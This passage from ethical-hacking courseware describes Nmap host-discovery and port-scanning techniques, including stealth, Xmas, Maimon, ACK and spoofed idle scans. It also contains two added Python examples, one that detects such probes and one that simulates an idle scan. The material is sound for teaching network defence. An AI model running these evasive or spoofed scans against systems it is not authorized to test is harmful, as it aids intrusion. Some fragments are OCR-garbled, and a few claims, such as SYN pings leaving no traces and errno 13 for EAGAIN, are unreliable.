Figure 3.26: ICMP timestamp ping in Zenmap

ICMP Address Mask Ping Scan

ICMP address mask ping is another alternative to the traditional ICMP ECHO ping, where the attackers send an ICMP address mask query to the target host to acquire information related to the subnet mask. However, the address mask response from the destination host is conditional, and it may or may not respond with the appropriate subnet value depending on its configuration by the administrator at the target's end. This type of ping method is also effective in identifying the active hosts similarly to the ICMP timestamp ping, specifically when the administrator blocks the traditional ICMP Echo ping. In Zenmap, the -PM option is used to perform an ICMP address mask ping scan.

Figure 3.27: ICMP address mask ping in Zenmap

TCP SYN Ping Scan

TCP SYN ping is a host discovery technique for probing different ports to determine if the port is online and to check if it encounters any firewall rulesets. In this type of host discovery technique, an attacker uses the Nmap tool to initiate the three-way handshake by sending the empty TCP SYN flag to the target host. After receiving SYN, the target host acknowledges the receipt by sending the ACK flag to the attacker. After reception of the ACK flag, the attacker confirms that the target host is active and terminates the connection by sending an RST flag to the target host machine (since his/her objective of host discovery is accomplished). Port 80 is used as the default destination port. A range of ports can also be specified in this type of pinging format without inserting a space between -PS and the port number (e.g., -PS22-25,80,113,1050,35000), where the probe will be performed against each port parallelly. In Zenmap, the -PS option is used to perform a TCP SYN ping scan.

Figure 3.28: TCP SYN ping scan for host discovery

Advantages

- As the machines can be scanned parallelly, the scan never gets the time-out error while waiting for the response.
- TCP SYN ping can be used to determine if the host is active without creating any connection. Hence, the logs are not recorded at the system or network level, enabling the attacker to leave no traces for detection.
Figure 3.29: TCP SYN ping scan in Zenmap
TCP ACK Ping Scan

TCP ACK ping is similar to TCP SYN ping, albeit with minor variations. TCP ACK ping also uses the default port 80. In the TCP ACK ping technique, the attackers send an empty TCP ACK packet to the target host directly. Since there is no prior connection between the attacker and the target host, after receiving the ACK packet, the target host responds with an RST flag to terminate the request. The reception of this RST packet at the attacker's end indicates that the host is active. In Zenmap, the -PA option is used to perform a TCP ACK ping scan.

Figure 3.30: TCP ACK ping scan for host discovery

Both the SYN and the ACK packet can be used to maximize the chances of bypassing the firewall. However, firewalls are mostly configured to block the SYN ping packets, as they are the most common pinging technique. In such cases, the ACK probe can be effectively used to bypass these firewall rulesets easily.

Figure 3.31: TCP ACK ping scan in Zenmap

IP Protocol Ping Scan

IP protocol ping is the latest host discovery option that sends IP ping packets with the IP header of any specified protocol number. It has the same format as the TCP and UDP ping. This technique tries to send different packets using different IP protocols, hoping to get a response indicating that a host is online.

Multiple IP packets for ICMP (protocol 1), IGMP (protocol 2), and IP-in-IP (protocol 4) are sent by default when no protocols are specified. For configuring the default protocols, change DEFAULT_PROTO_PROBE_PORT_SPEC in nmap.h during compile time. For specific protocols such as ICMP, IGMP, TCP (protocol 6), and UDP (protocol 17), the packets are to be sent with proper protocol headers, and for the remaining protocols, only the IP header data is to be sent.

Figure 3.32: IP protocol ping scan for host discovery

In a nutshell, attackers send different probe packets of different IP protocols to the target host; any response from any probe indicates that a host is online. In Zenmap, the -PO option is used to perform an IP protocol ping scan.

Figure 3.33: IP protocol ping scan in Zenmap
Module Flow

- Network Scanning Concepts
- Scanning Tools
- Host Discovery
- Port and Service Discovery
- OS Discovery (Banner Grabbing/OS Fingerprinting)
- Scanning Beyond IDS and Firewall
Port and Service Discovery

The next step in the network scanning process involves checking the open ports and services in live systems. After performing a ping scan, once attackers detect the live systems in the target network, they try to find open ports and services in the discovered live systems. This discovery of open ports and services can be performed via various port scanning techniques. Administrators often use port scanning techniques to verify the security policies of their networks, whereas attackers use them to identify open ports and running services on a host with the intent of compromising the network. Moreover, sometimes, users unknowingly keep unnecessary open ports on their systems. An attacker takes advantage of such open ports to launch attacks. This section describes the common ports and corresponding services along with various port scanning techniques and tools used by the attacker to perform port scanning.
List of Common Ports and Services

The important reserved ports are listed below:

Name              Port/Protocol     Service Description
echo              7/tcp             Echo
echo              7/udp             Echo
discard           9/tcp             sink null
discard           9/udp             sink null
systat            11/tcp            Users
daytime           13/tcp
daytime           13/udp
netstat           15/tcp
qotd              17/tcp            Quote
chargen           19/tcp            ttytst source
chargen           19/udp            ttytst source
ftp-data          20/tcp            ftp data transfer
ftp               21/tcp            ftp command
ssh               22/tcp            Secure Shell
telnet            23/tcp
smtp              25/tcp            Mail
time              37/tcp            Timeserver
time              37/udp            Timeserver
rlp               39/udp
nickname          43/tcp            whois
domain            53/tcp            domain name server
domain            53/udp            domain name server
sql*net           66/tcp            Oracle SQL*NET
sql*net           66/udp            Oracle SQL*NET
bootps            67/tcp            bootp server
bootps            67/udp            bootp server
bootpc            68/tcp            bootp client
bootpc            68/udp            bootp client
tftp              69/tcp            Trivial File Transfer
tftp              69/udp            Trivial File Transfer
gopher            70/tcp            gopher server
finger            79/tcp            Finger
www-http          80/tcp            www
www-http          80/udp            www
kerberos          88/tcp            Kerberos
kerberos          88/udp            Kerberos
pop               109/tcp           PostOffice V.2
pop3              110/tcp           PostOffice V.3
sunrpc            111/tcp           RPC 4.0 portmapper
sunrpc            111/udp           RPC 4.0 portmapper
auth/ident        113/tcp           Authentication Service
auth              113/udp           Authentication Service
audionews         114/tcp           Audio News Multicast
audionews         114/udp           Audio News Multicast
nntp              119/tcp           Usenet Network News Transfer
nntp              119/udp           Usenet Network News Transfer
ntp               123/tcp           Network Time Protocol
ntp               123/udp           Network Time Protocol
netbios-ns        137/tcp           NETBIOS Name Service
netbios-ns        137/udp           NETBIOS Name Service
netbios-dgm       138/tcp           NETBIOS Datagram Service
netbios-dgm       138/udp           NETBIOS Datagram Service
netbios-ssn       139/tcp           NETBIOS Session Service
netbios-ssn       139/udp           NETBIOS Session Service
imap              143/tcp           Internet Message Access Protocol
imap              143/udp           Internet Message Access Protocol
sql-net           150/tcp           SQL-NET
sql-net           150/udp           SQL-NET
sqlsrv            156/tcp           SQL Service
sqlsrv            156/udp           SQL Service
snmp              161/tcp
snmp              161/udp
snmp-trap         162/tcp
snmp-trap         162/udp
cmip-man          163/tcp           CMIP/TCP Manager
cmip-man          163/udp           CMIP/TCP Manager
cmip-agent        164/tcp           CMIP/TCP Agent
cmip-agent        164/udp           CMIP/TCP Agent
irc               194/tcp           Internet Relay Chat
irc               194/udp           Internet Relay Chat
at-rtmp           201/tcp           AppleTalk Routing Maintenance
at-rtmp           201/udp           AppleTalk Routing Maintenance
at-nbp            202/tcp           AppleTalk Name Binding
at-nbp            202/udp           AppleTalk Name Binding
at-3              203/tcp           AppleTalk
at-3              203/udp           AppleTalk
at-echo           204/tcp           AppleTalk Echo
at-echo           204/udp           AppleTalk Echo
at-5              205/tcp           AppleTalk
at-5              205/udp           AppleTalk
at-zis            206/tcp           AppleTalk Zone Information
at-zis            206/udp           AppleTalk Zone Information
at-7              207/tcp           AppleTalk
at-7              207/udp           AppleTalk
at-8              208/tcp           AppleTalk
at-8              208/udp           AppleTalk
ipx               213/tcp           Novell
ipx               213/udp           Novell
imap3             220/tcp           Interactive Mail Access Protocol v3
imap3             220/udp           Interactive Mail Access Protocol v3
aurp              387/tcp           AppleTalk Update-Based Routing
aurp              387/udp           AppleTalk Update-Based Routing
netware-ip        396/tcp           Novell Netware over IP
netware-ip        396/udp           Novell Netware over IP
rmt               411/tcp           Remote mt
rmt               411/udp           Remote mt
kerberos-ds       445/tcp           Microsoft-DS
kerberos-ds       445/udp           Microsoft-DS
isakmp            500/udp           ISAKMP/IKE
fcp               510/tcp           FirstClass Server
exec              512/tcp           BSD rexecd(8)
comsat/biff       512/udp           used by mail system to notify users
login             513/tcp           BSD rlogind(8)
who               513/udp           BSD rwhod(8)
shell             514/tcp           cmd, BSD rshd(8)
syslog            514/udp           BSD syslogd(8)
printer           515/tcp           spooler lpd(8)
printer           515/udp           spooler lpd(8)
talk              517/tcp           BSD talkd(8)
talk              517/udp           Talk
ntalk             518/tcp           New Talk (talkd)
ntalk             518/udp           SunOS talkd(8)
netnews           532/tcp           Readnews
uucp              540/tcp           uucpd, BSD uucpd(8)
uucp              540/udp           uucpd, BSD uucpd(8)
klogin            543/tcp           Kerberos Login
klogin            543/udp           Kerberos Login
kshell            544/tcp           Kerberos Shell
kshell            544/udp           Kerberos Shell
ekshell           (not legible)     Kerberos encrypted remote shell (krcmd)
pcserver          (not legible)     ECD Integrated PC board server
mount             635/udp           NFS Mount Service
pcnfs             640/udp           PC-NFS DOS Authentication
bwnfs             650/udp           BW-NFS DOS Authentication
flexlm            744/tcp           Flexible License Manager
flexlm            744/udp           Flexible License Manager
kerberos-adm      749/tcp           Kerberos Administration
kerberos-adm      749/udp           Kerberos Administration
kerberos          750/tcp           kdc Kerberos authentication (tcp)
kerberos          750/udp           Kerberos authentication
kerberos_master   751/udp           Kerberos authentication
kerberos_master   751/tcp           Kerberos authentication
krb_prop          754/tcp           Kerberos slave propagation
applix            999/udp           Applixware
socks             1080/tcp
socks             1080/udp
kpop              1109/tcp          Pop with Kerberos
ms-sql-s          1433/tcp          Microsoft SQL Server
ms-sql-s          1433/udp          Microsoft SQL Server
ms-sql-m          1434/tcp          Microsoft SQL Monitor
ms-sql-m          1434/udp          Microsoft SQL Monitor
pptp              1723/tcp          pptp
pptp              1723/udp          pptp
nfs               2049/tcp          Network File System
nfs               2049/udp          Network File System
eklogin           2105/tcp          Kerberos encrypted rlogin
rkinit            2108/tcp          Kerberos remote kinit
kx                2111/tcp          X over Kerberos
kauth             2120/tcp          Remote kauth
lyskom            4894/tcp          LysKOM (conference system)
sip               5060/tcp          Session Initiation Protocol
sip               5060/udp          Session Initiation Protocol
x11               6000-6063/tcp     X Window System
x11               6000-6063/udp     X Window System
irc               6667/tcp          Internet Relay Chat
afs               7000-7009/tcp     Andrew File System
afs               7000-7009/udp     Andrew File System

Table 3.2: Reserved ports table

Port Scanning Techniques

Port scanning techniques are further categorized as described below. This categorization is based on the type of protocol used for communication in the network.

- TCP Scanning:
  - Open TCP Scanning Methods
    - TCP Connect/Full Open Scan
  - Stealth TCP Scanning Methods
    - Half-open Scan
    - Inverse TCP Flag Scan
      - Xmas Scan
      - FIN Scan
      - NULL Scan
      - Maimon Scan
    - ACK Flag Probe Scan
      - TTL Based Scan
      - Window Scan
  - Third Party and Spoofed TCP Scanning Methods
    - IDLE/IP ID Header Scan
- UDP Scanning:
  - UDP Scanning
- SCTP Scanning:
  - SCTP INIT Scanning
  - SCTP COOKIE/ECHO Scanning
- SSDP and List Scanning:
  - SSDP Scanning
  - List Scanning
- IPv6 Scanning:
  - IPv6 Scanning
TCP Connect/Full Open Scan

Source: http://insecure.org

TCP Connect/Full Open Scan is one of the most reliable forms of TCP scanning. In TCP Connect scanning, the OS's TCP connect() system call tries to open a connection to every port of interest on the target machine. If the port is listening, the connect() call will result in a successful connection with the host on that particular port; otherwise, it will return an error message stating that the port is not reachable.

TCP Connect scan completes a three-way handshake with the target machine. In the TCP three-way handshake, the client sends a SYN packet, which the recipient acknowledges with a SYN+ACK packet. Then, the client acknowledges the SYN+ACK packet with an ACK packet to complete the connection. Once the handshake is completed, the scanner sends an RST packet to end the connection.

Figure 3.34: Scan result when a port is open

Figure 3.35: Scan result when a port is closed
Making a separate connect() call for every targeted port in a linear manner would take a long time over a slow connection. The attacker can accelerate the scan using many sockets in parallel. Using non-blocking I/O allows the attacker to set a short time-out period and watch all the sockets simultaneously. In Zenmap, the -sT option is used to perform TCP Connect/full open scan.

Figure 3.36: TCP Connect/Full open scan using Zenmap

The drawback of this type of scan is that it is easily detectable and filterable. The logs in the target system will disclose the connection. Such scanning does not require superuser privileges.
Stealth Scan (Half-open Scan)

The stealth scan involves abruptly resetting the TCP connection between the client and the server before completion of the three-way handshake signals, hence making the connection half-open. A stealth scan sends a single frame to a TCP port without any TCP handshaking or additional packet transfers. This type of scan sends a single frame with the expectation of a single response. The half-open scan partially opens a connection but stops halfway through. The stealth scan is also called a "SYN scan," because it only sends the SYN packet. This prevents the service from notifying the incoming connection. TCP SYN or half-open scanning is a stealth method of port scanning.

The stealth scan also implements the three-way handshake methodology. In the last stage, it examines the packets entering the interface and terminates the connection before triggering a new initialization to identify remote ports. The stealth scan process is described below.

- The client sends a single SYN packet to the server on the appropriate port.
- If the port is open, the server subsequently responds with a SYN/ACK packet.
- If the server responds with an RST packet, then the remote port is in the "closed" state.
- The client sends the RST packet to close the initiation before a connection can be established.

Figure 3.37: Port is open

Figure 3.38: Port is closed

Attackers use stealth scanning techniques to bypass firewall rules and logging mechanisms, and they hide themselves as usual under network traffic. In Zenmap, the -sS option is used to perform a stealth scan/TCP half-open scan.

Figure 3.39: TCP stealth/Half Open scan using Zenmap
Inverse TCP Flag Scan

Attackers send TCP probe packets with a TCP flag (FIN, URG, PSH) set or with no flags. When the port is open, the attacker does not get any response from the host, whereas when the port is closed, he or she receives the RST from the target host.

Figure 3.40: Inverse TCP flag scan when port is open

Figure 3.41: Inverse TCP flag scan when port is closed
Security mechanisms such as firewalls and IDS detect the SYN packets sent to the sensitive ports of the targeted hosts. Programs such as Synlogger and Courtney are available to log half-open SYN flag scan attempts. At times, the probe packets enabled with TCP flags can pass through filters undetected, depending on the security mechanisms installed.

An inverted technique involves probing a target using a half-open SYN flag because the closed ports can only send the response back. According to RFC 793, an RST/ACK packet is sent for connection reset when the host closes a port. Attackers take advantage of this feature to send TCP probe packets to each port of the target host with various TCP flags set.
Common flag configurations used for a probe packet include:

- A FIN probe with the FIN TCP flag set
- An Xmas probe with the FIN, URG, and PUSH TCP flags set
- A NULL probe with no TCP flags set
- A SYN/ACK probe
All closed ports on the targeted host will send an RST/ACK response. Since OSs such as Windows completely ignore the RFC 793 standard, you cannot see the RST/ACK response when connected to a closed port on the target host. However, this technique is effective when used with UNIX-based OSs.

Advantages

- Avoids many IDS and logging systems; highly stealthy

Disadvantages

- Needs raw access to network sockets, thus requiring super-user privileges
- Mostly effective against hosts using a BSD-derived TCP/IP stack (not effective against Microsoft Windows hosts, in particular)

the probeTCPno
isset, as
NULL on
the
scanning.
If there is
only
the flag
Note: Inverseflagscanning knownas FIN,URG,
packet.
flag flag
itis known
andPSHscanningbased
If
set i n
FIN is set,it
as if
is known FIN scanning,
set, as
and all ofFIN,URG,andPSHare it is known Xmas
scanning.

Xmas Scan

Xmas scan is a type of inverse TCP scanning technique with the FIN, URG, and PUSH flags set to send a TCP frame to a remote device. If the target has opened the port, then you will receive no response from the remote system. If the target has closed the port, then you will receive a remote system reply with an RST. You can use this port scanning technique to scan large networks and find which host is up and what services it is offering. This technique describes all TCP flag sets. When all flags are set, some systems hang; hence, the flags are often set in the nonsense pattern URG-PSH-FIN. Attackers use the TCP Xmas scan to determine if ports are closed on the target machine via the RST packet. This scan only works when systems are compliant with RFC 793-based TCP/IP implementation. It will not work against any current version of Microsoft Windows.
Figure 3.42: Xmas scan when the port is open
BSD Networking Code

This method relies on the BSD networking code. Thus, you can use this only for UNIX hosts; it does not support Windows NT. If the user scans any Microsoft system, it will show that all the ports on the host are open.

Transmitting Packets

You can initialize all the flags when transmitting the packet to a remote host. If the target system accepts the packet and does not send any response, it means that the port is open. If the target system sends an RST flag, then it implies that the port is closed.

Advantages

- It avoids IDS and the TCP three-way handshake

Disadvantages

- It works on the UNIX platform only.

In Zenmap, the -sX option is used to perform Xmas scan, whereas the -sF and -sN options are used to perform FIN scan and NULL scan, respectively.

Figure 3.44: Xmas scan output using Zenmap
TCP Maimon Scan

This scan technique is very similar to NULL, FIN, and Xmas scan, but the probe used here is FIN/ACK. In most cases, to determine if the port is open or closed, the RST packet should be generated as a response to a probe request. However, in many BSD systems, the port is open if the packet gets dropped in response to a probe.

Nmap interprets a port as open|filtered when there is no response from the Maimon scan probe even after many retransmissions. The port is closed if the probe gets a response as an RST packet. The port is filtered when the ICMP unreachable error (type 3, code 1, 2, 3, 9, 10, or 13) is returned from the target host. In Zenmap, the -sM option is used to perform the TCP Maimon scan.
FIN/ACK
Probe
ee No Response
ja) x<
Attacker Target
Figure
3.45:
Maimon
scan
TCP

FIN/ACK
of
pen
port result

Probe
4-4
oe
>

20
I <
RSTpacket
‘Attacker Target
Figure
3.46:
scan
of
TCPMaimon result sed port

ical andCountermensores
Mackin ©by E-Comel
Copyright
FIN/ACK
Probe

ICMPunreachable
error

Attacker Target

© ras010%0
acting
heap 7 fe) at 2039-10-25

Figure3.48:
1? Maman scan portstate in Zenmap
displaying

03
Page
Module 296

tical
Making
and by CountermensoresCopyright©
Comet
ACK Flag Probe Scan

Attackers send TCP probe packets with the ACK flag set to a remote device and then analyze the header information (TTL and WINDOW field) of the received RST packets to find out if the port is open or closed. The ACK flag probe scan exploits the vulnerabilities within the BSD-derived TCP/IP stack. Thus, such scanning is effective only on those OSs and platforms on which the TCP/IP stack derives from BSD.

Categories of ACK flag probe scanning include:

▪ TTL-based ACK Flag Probe Scanning

In this scanning technique, you will first need to send ACK probe packets (several thousands) to different TCP ports and then analyze the TTL field value of the received RST packets. In Zenmap, the syntax nmap -ttl [time] [target] is used to perform a TTL-based scan.

Figure 3.49: TTL-based ACK flag probe scanning (ACK probe packets from attacker to target host; RST responses returned)

If the TTL value of the RST packet on a particular port is less than the boundary value of 64, then that port is open. An example showing a log of the first four RST packets received is presented below:

Figure 3.50: Screenshot showing the open port based on the TTL value of the RST packet

In this example, port 22 returned a TTL value of 50, which is less than 64; all other ports returned a TTL value of 80, which is greater than 64. Therefore, port 22 is open.

▪ Window-based ACK Flag Probe Scanning

In this scanning technique, you will first need to send ACK probe packets (several thousands) to different TCP ports and then analyze the window field value of the received RST packets. The user can use this scanning technique when all of the ports return the same TTL value. In Zenmap, the -sW option is used to perform a window scan.

Figure 3.51: Window-based ACK flag probe scanning (ACK probe packets from attacker to target host; RST responses returned)

If the window value of the RST packet on a particular port is non-zero, then that port is open. An example showing a log of the first four RST packets received is presented below:

Figure 3.52: Screenshot showing the open port based on the window value of the RST packet

The above figure shows that the TTL value returned for each packet is the same; hence, you cannot perform TTL-based ACK flag probe scanning to find the open ports. Therefore, when you observe the window value, the third packet has a non-zero window value, which means that the port is open. When the returned RST window value is zero, then the port is closed. If there is no response even after many retransmissions and an ICMP unreachable error (type 3, code 1, 2, 3, 9, 10, or 13) is returned, then the port is inferred to be a filtered port.

Figure 3.53: TCP Window scan result of an open port (TCP/ACK probe from attacker; TCP RST with non-zero window field from target)

Figure 3.54: TCP Window scan result of closed port (TCP/ACK probe from attacker; TCP RST with zero window field from target)

Figure 3.55: TCP Window scan result of filtered port (TCP/ACK probe from attacker; no response from target)

Advantage:
▪ This type of scan can evade IDS in most cases

Disadvantages:
▪ It is extremely slow and can exploit only older OSs with vulnerable BSD-derived TCP/IP stacks

Checking the Filtering Systems of Target Networks

The ACK flag probe scanning technique also helps in checking the filtering systems of target networks. The attacker sends an ACK probe packet to check the filtering mechanism (firewalls) of packets employed by the target network. Sending an ACK probe packet with a random sequence number and getting no response from the target means that the port is filtered (stateful firewall is present); an RST response from the target means that the port is not filtered (no firewall is present).

Figure: Checking the filtering of target networks (probe packet with ACK flag from attacker to target host)

ACK Flag Probe Scanning using Nmap

In Zenmap, the -sA option is used to perform an ACK flag probe scan.

Figure 3.58: ACK flag probe scanning using Zenmap
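The probe types described in the Xmas, Maimon and ACK flag probe sections above, seen from the defender's side: an added example (not code from the courseware) that classifies TCP segments by their flag byte and alerts when one source sends such probes to many ports within a short window. The log format, the window and port thresholds, and the sample records are constructed for the demo.

```python
"""
Added example (not part of the CEH courseware): a small defender-side detector
for the stealth TCP probes discussed above.  It classifies each segment by its
flag combination (NULL, FIN, Xmas = URG-PSH-FIN, Maimon = FIN/ACK, ACK-only)
and flags a source that touches many distinct ports with such probes in a
short window.  The packet records below are constructed sample data.
"""
from collections import defaultdict

# Flag bits as laid out in the TCP header (RFC 793).
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20

# Probe types discussed in the text, keyed by the exact flag set that defines them.
PROBE_TYPES = {
    0: "NULL",
    FIN: "FIN",
    FIN | PSH | URG: "XMAS",      # the "nonsense pattern" URG-PSH-FIN
    FIN | ACK: "MAIMON",          # FIN/ACK probe
    ACK: "ACK",                   # ACK flag probe / window scan
    SYN: "SYN",                   # ordinary connection attempt or SYN scan
}

# Probes that never open a connection, so a firewall that only logs SYNs misses them.
STEALTH = {"NULL", "FIN", "XMAS", "MAIMON", "ACK"}

def classify(flags: int) -> str:
    """Return the probe name for a flag byte, or 'OTHER' for normal traffic."""
    return PROBE_TYPES.get(flags & 0x3F, "OTHER")   # ignore ECE/CWR bits

def parse_record(line: str) -> dict:
    """Parse 'ts src dst dport flags' (constructed format; flags in hex)."""
    ts, src, dst, dport, flags = line.split()
    return {"ts": float(ts), "src": src, "dst": dst,
            "dport": int(dport), "flags": int(flags, 16)}

def detect_scans(lines, window=10.0, port_threshold=5):
    """
    Group stealth probes by source and report every source that hits at least
    `port_threshold` distinct destination ports within `window` seconds.
    Returns {src: {"probe_types": set, "ports": set, "first": ts, "last": ts}}.
    """
    per_src = defaultdict(lambda: {"probe_types": set(), "ports": set(),
                                   "first": None, "last": None})
    for line in lines:
        rec = parse_record(line)
        kind = classify(rec["flags"])
        if kind not in STEALTH:
            continue
        entry = per_src[rec["src"]]
        if entry["first"] is None or rec["ts"] - entry["first"] > window:
            # start a fresh window for this source
            entry.update(probe_types=set(), ports=set(), first=rec["ts"])
        entry["probe_types"].add(kind)
        entry["ports"].add(rec["dport"])
        entry["last"] = rec["ts"]
    return {src: e for src, e in per_src.items()
            if len(e["ports"]) >= port_threshold}

# Constructed sample records: ts src dst dport flags(hex)
SAMPLE_LOG = [
    "100.0 10.0.0.6 10.0.0.8 21  0x29",   # XMAS probe (FIN|PSH|URG)
    "100.1 10.0.0.6 10.0.0.8 22  0x29",
    "100.2 10.0.0.6 10.0.0.8 23  0x11",   # MAIMON probe (FIN|ACK)
    "100.3 10.0.0.6 10.0.0.8 25  0x00",   # NULL probe
    "100.4 10.0.0.6 10.0.0.8 80  0x10",   # ACK probe
    "100.5 10.0.0.6 10.0.0.8 443 0x01",   # FIN probe
    "101.0 10.0.0.9 10.0.0.8 80  0x02",   # normal SYN from another host
    "101.1 10.0.0.9 10.0.0.8 80  0x18",   # PSH|ACK data segment: OTHER
]

if __name__ == "__main__":
    for src, info in detect_scans(SAMPLE_LOG).items():
        print(f"ALERT {src}: {sorted(info['probe_types'])} "
              f"on ports {sorted(info['ports'])}")
```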
IDLE/IPID Header Scan

The IDLE/IPID Header scan is a TCP port scan method that you can use to send a spoofed source address to a computer to find out what services are available. It offers complete blind scanning of a remote host. Most network servers listen on TCP ports, such as web servers on port 80 and mail servers on port 25. A port is considered "open" if an application is listening on the port. One way to determine whether a port is open is to send a "SYN" (session establishment) packet to the port. The target machine will send back a "SYN|ACK" (session request acknowledgement) packet if the port is open or an "RST" (Reset) packet if the port is closed. A machine that receives an unsolicited SYN|ACK packet will respond with an RST. An unsolicited RST will be ignored. Every IP packet on the Internet has a "fragment identification" number (IPID). The OS increases the IPID for each packet sent; thus, probing the IPID gives an attacker the number of packets sent since the last probe. In Zenmap, the -sI option is used to perform the IDLE scan.

Figure 3.59: IDLE/IPID header scan using Zenmap

The attacker performs this scan by impersonating another computer via spoofing. The attacker does not send a packet from her/his IP address; instead, he/she uses another host, often called a "zombie," to scan the remote host and identify any open ports. In this attack, the attacker relies on the IPID sequence numbers of the zombie host, and if the remote host checks the IP of the scanning party, the IP of the zombie machine will be displayed.

IDLE Scan

Every IP packet on the Internet has a fragment identification number (IPID) that uniquely identifies fragments of an original IP datagram. As many OSs simply increase this number for each packet that they send, probing the IPID can tell an attacker how many packets the user sent since the last probe.

The first step in performing an idle scan is to find an appropriate zombie. A zombie that assigns IPID packets incrementally on a global basis is an appropriate or idle zombie for performing the idle scan. The shorter the time interval between the attacker-zombie and the zombie-target request/response, the faster is the scan.

Step 1: Choose a "Zombie" and Probe its Current IP Identification (IPID) Number

In the first step, you will send the SYN+ACK packet to the zombie machine to probe its IPID number. Here, a TCP SYN+ACK probe packet is sent to the zombie to probe the IPID number but not establish the connection (three-way handshake).

Figure 3.60: Idle scan: Step 1 (probe IPID with a SYN+ACK packet; the zombie answers with an RST packet carrying IPID=31337)

As the zombie does not expect a SYN+ACK packet, it will deny the connection by sending back an RST packet. Analyze the RST packet sent by the zombie machine to extract the IPID. In the diagram shown in the slide above, assume that the zombie responds with IPID=31337. Furthermore, assume that this IPID is X.

Step 2

The attacker sends a SYN packet to the target machine on port 80, spoofing the IP address of the zombie.

Idle Scan: Step 2.1 (Open Port)

If the port is open, the target will send the SYN+ACK packet to the zombie (as the IP address was spoofed) to proceed with the three-way handshake. Since the zombie did not expect a SYN+ACK packet from the target machine, it will respond with an RST packet.

Figure 3.61: Port is open

Since every IP packet has a "fragment identification" number, which increases by one for every packet transmission, the zombie will now use its next available IPID, i.e., 31338 (X+1).

Idle Scan: Step 2.2 (Closed Port)

Assume that the port on the target is closed. Subsequently, on receiving the SYN packet from the attacker (you), the target will respond with an RST, and the zombie will remain idle without taking any further action.

Figure 3.62: Port is closed

Step 3

Now, follow step 1 again to probe the IPID number.

Figure 3.63: Idle scan: Step 3 (probe IPID with a SYN+ACK packet; the RST response carries IPID=31339, incremented by 2 since step 1, so port 80 must be open)

Send a SYN+ACK packet to the zombie, and it will respond with an RST packet containing the IPID. Assume that the port on the target was open and that the zombie has already sent an RST packet to the target; then, the IPID number is increased by 1. Now, the zombie responds to the attacker with an RST packet using its next IPID, i.e., 31339 (X+2). Consequently, the IPID is increased by 2, which implies that the port on the target machine was open. Thus, using an idle scan, an attacker can find out the open ports and services on the target machine by spoofing his/her IP address with a zombie's IP address.
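The three-step IPID inference above, simulated as an added example (not the courseware's code) with in-memory hosts only. The Zombie and Target classes follow the behaviour the text describes (RST to an unsolicited SYN|ACK consumes one IPID, an unsolicited RST is ignored); the randomized variant and the ScriptedIpids helper are my additions to show why a host that does not increment its IPID on a single global counter cannot serve as a zombie, which is the defensive fix.

```python
"""
Added example (not from the courseware): a simulation of the idle scan's
IPID inference.  Zombie(randomized=False) is the globally sequential IPID
counter the text requires; Zombie(randomized=True) models a stack that
randomizes IPIDs, which makes the delta meaningless.  No packets are sent.
"""
import random

class ScriptedIpids:
    """Stand-in for a randomizing IPID generator that returns preset values (demo only)."""
    def __init__(self, values):
        self.values = list(values)
    def randrange(self, lo, hi):
        return self.values.pop(0)

class Zombie:
    """An idle host.  With randomized=False its IPID is one global counter."""
    def __init__(self, start_ipid=31337, randomized=False, rng=None):
        self.ipid = start_ipid
        self.randomized = randomized
        self.rng = rng if rng is not None else random.Random(1)  # seeded for repeatability

    def _next_ipid(self):
        if self.randomized:
            return self.rng.randrange(0, 65536)
        self.ipid = (self.ipid + 1) & 0xFFFF          # 16-bit field wraps
        return self.ipid

    def receive_syn_ack(self):
        """Unsolicited SYN|ACK: reply RST, consuming one IPID.  Returns the RST's IPID."""
        return self._next_ipid()

    def receive_rst(self):
        """Unsolicited RST is ignored, so no IPID is consumed."""
        return None

class Target:
    def __init__(self, open_ports):
        self.open_ports = set(open_ports)

    def receive_syn(self, port, src_host):
        """SYN to an open port: SYN|ACK back to the (spoofed) source.  Closed: RST."""
        if port in self.open_ports:
            src_host.receive_syn_ack()
        else:
            src_host.receive_rst()

def idle_scan_port(zombie, target, port):
    """Steps 1-3 from the text; returns (state, ipid_delta)."""
    x = zombie.receive_syn_ack()          # step 1: zombie's current IPID (X)
    target.receive_syn(port, zombie)      # step 2: SYN to target, source spoofed as zombie
    y = zombie.receive_syn_ack()          # step 3: probe the zombie again
    delta = (y - x) & 0xFFFF
    if delta == 2:
        return "open", delta     # zombie sent RST to target (+1) and RST to us (+1)
    if delta == 1:
        return "closed", delta   # only our own probe consumed an IPID
    return "unknown", delta      # zombie not idle, randomized IPIDs, or lost packets

if __name__ == "__main__":
    target = Target(open_ports={80})
    seq = Zombie(start_ipid=31337)
    print("sequential zombie, port 80:", idle_scan_port(seq, target, 80))
    print("sequential zombie, port 81:", idle_scan_port(seq, target, 81))
    rnd = Zombie(randomized=True)
    print("randomized zombie, port 80:", idle_scan_port(rnd, target, 80))
```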
UDP Scanning

UDP Raw ICMP Port Unreachable Scanning

UDP port scanners use the UDP protocol instead of TCP. There is no three-way handshake for the UDP scan. The UDP protocol can be more challenging to use than TCP scanning because you can send a packet, but you cannot determine whether the host is alive, dead, or filtered. However, you can use one ICMP message that checks for open or closed ports. If you send a UDP packet to a port without an application bound to it, the IP stack will return an ICMP port unreachable packet. If any port returns an ICMP error, it will be closed, leaving the ports that did not answer if they are open or filtered through the firewall.

Figure 3.64: UDP scanning (the attacker asks "Are you open on UDP port 29?"; if the port is closed, an ICMP port unreachable message is received)

This happens because open ports do not have to send an acknowledgement in response to a probe, and closed ports are not even required to send an error packet.

UDP Packets

Source: https://nmap.org

When you send a packet to a closed UDP port, most of the hosts send an ICMP_PORT_UNREACH error. Thus, you can determine whether a port is not open. However, UDP packets and ICMP errors are not guaranteed to arrive. Thus, UDP scanners of this type must implement retransmission of packets that appear lost. UDP scanners interpret lost traffic as open ports. In Zenmap, the -sU option is used to perform a UDP scan.

Figure 3.65: UDP scanning using Zenmap (Command: nmap -sU -v 10.10.10.10; the scan reports open port 137/udp on 10.10.10.10)

In addition, this scanning technique is slow because it limits the ICMP error message rate as a form of compensation to machines that apply RFC 1812 section 4.3.2.8. A remote host will require access to the raw ICMP socket to distinguish closed ports from unreachable ports.

UDP RECVFROM() and WRITE() Scanning

Although non-root users cannot read unreachable port errors directly, Linux informs you indirectly when it receives messages.

▪ Example: For example, a second write() call to a closed port will usually fail. Various scanners, such as Netcat and Pluvius' pscan.c, perform recvfrom() on non-blocking UDP sockets, and they usually return EAGAIN ("Try Again," errno 13) if the ICMP error has not been received or ECONNREFUSED ("Connection refused," errno 111) otherwise. This technique is used for determining open ports when non-root users use -u (UDP). Root users can also use the -l (lamer UDP scan) option to force this process.

Advantage:
